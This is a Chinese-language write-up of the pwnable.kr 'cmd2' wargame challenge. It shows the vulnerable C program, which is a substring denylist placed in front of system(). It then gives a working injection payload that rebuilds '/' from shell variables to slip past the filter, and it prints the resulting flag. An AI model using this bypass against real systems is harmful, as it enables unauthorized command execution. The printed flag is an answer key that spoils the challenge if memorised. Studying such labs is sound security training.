试了一晚上终于试出来了。。。。真心曲折,考察linux脚本。
里面需要注意的点如下:
1. Linux里面的sh和bash是不一样的,在不同系统上的实现也有不同(Ubuntu上的/bin/sh是dash)。system()是通过sh而不是bash来执行命令的;sh是为Unix所设计,讲究精简,比bash少一些功能,所以在bash里调通的写法放到这里不一定能用,导致调试脚本时很多地方错了不知道怎么改,只能一步一步试出来;
2. 重点在于构造“/”这个字符:filter()不允许参数里直接出现“/”,PATH又被改成了一个无效目录,所以要执行命令只能在shell里另外拼出“/”来写绝对路径;
3. 到此Toddler's Bottle已经刷完了,我的教程也写到了Lesson 3,接下来的题目writeup很少,我自己做也比较困难,可能转Protostar训练了吧? 前面进展缓慢,后面加速了~
cmd2@ubuntu:~$ ls
cmd2 cmd2.c flag
cmd2@ubuntu:~$ cat cmd2.c
#include <stdio.h>
#include <string.h>
/*
 * Denylist check on the command string.
 *
 * Returns how many of the three forbidden substrings ("/", "`", "flag")
 * occur in cmd: 0 when none is present, up to 3 when all are. main()
 * rejects the command on any non-zero result.
 *
 * cmd must not be NULL; strstr() on a null pointer is undefined behaviour.
 *
 * Security note: the check looks only at the literal bytes of cmd. The
 * string is later passed to system(), and the shell that system() starts
 * performs its own expansion afterwards, so the text checked here is not
 * necessarily the text the shell finally acts on. A literal-substring
 * denylist in front of a shell is therefore not a reliable boundary.
 */
int filter(char* cmd){
int r=0;
r += strstr(cmd, "/")!=0; /* path separator */
r += strstr(cmd, "`")!=0; /* backtick command substitution */
r += strstr(cmd, "flag")!=0; /* the literal file name */
return r;
}
/* The process environment: a NULL-terminated array of strings. */
extern char** environ;
/*
 * Blanks the inherited environment in place.
 *
 * Every string reachable from environ is overwritten with zero bytes over
 * its whole length. The pointers in the array are left untouched, so each
 * entry becomes an empty string instead of being removed.
 *
 * NOTE(review): this only scrubs what the process inherited. Variables
 * that a child shell sets up for itself at start-up are outside its reach,
 * so it should not be read as "the shell starts with no variables".
 */
void delete_env(){
char** p;
/* Stop at the terminating NULL pointer of the array. */
for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}
/*
 * Entry point: scrubs the environment, overrides PATH, and runs argv[1]
 * through system() when filter() accepts it. Returns 0 whether the
 * command was rejected or executed.
 *
 * NOTE(review): argv[1] is used without looking at argc. Started without
 * an argument, filter() would hand a null pointer to strstr().
 *
 * Security note: system() gives the string to the command interpreter, so
 * it is parsed as shell syntax rather than as one program name. For
 * untrusted input the durable mitigation is not a longer denylist but
 * keeping the shell out of the path: run a fixed program with an explicit
 * argv through an exec-family call or posix_spawn(), or accept only
 * commands from an allowlist.
 */
int main(int argc, char* argv[], char** envp){
delete_env();
/* PATH now names a single directory that is presumably absent, so commands
 * given without a path are not found. Shell builtins and commands given
 * with a full path do not depend on PATH. */
putenv("PATH=/no_command_execution_until_you_become_a_hacker");
/* Any forbidden substring: exit quietly without running anything. */
if(filter(argv[1])) return 0;
/* Echo the accepted command before executing it. */
printf("%s\n", argv[1]);
system( argv[1] );
return 0;
}
<"bin"${STR2}"find";STR4=${STR2}"usr"${STR2}"bin"${STR2}"xargs "${STR2}"bin"${STR2}"grep a";$STR3|$STR4'
STR=$(export);STR1=${STR#*home};STR2=${STR1%cmd2*};STR3=${STR2}"usr"${STR2}"bin"${STR2}"find";STR4=${STR2}"usr"${STR2}"bin"${STR2}"xargs "${STR2}"bin"${STR2}"grep a";$STR3|$STR4
/usr/bin/find: `./.bash_history': Permission denied
/bin/grep: ./.bash_history: Permission denied
./flag:FuN_w1th_5h3ll_v4riabl3s_haha
./cmd2.c:int filter(char* cmd){
./cmd2.c: r += strstr(cmd, "flag")!=0;
./cmd2.c:extern char** environ;
./cmd2.c: char** p;
./cmd2.c:int main(int argc, char* argv[], char** envp){
./cmd2.c: putenv("PATH=/no_command_execution_until_you_become_a_hacker");
./cmd2.c: if(filter(argv[1])) return 0;
./cmd2.c: printf("%s\n", argv[1]);
./cmd2.c: system( argv[1] );
Binary file ./cmd2 matches
【LINUX】pwnable.kr cmd2 writeup
原文地址:http://www.cnblogs.com/windcarp/p/4657974.html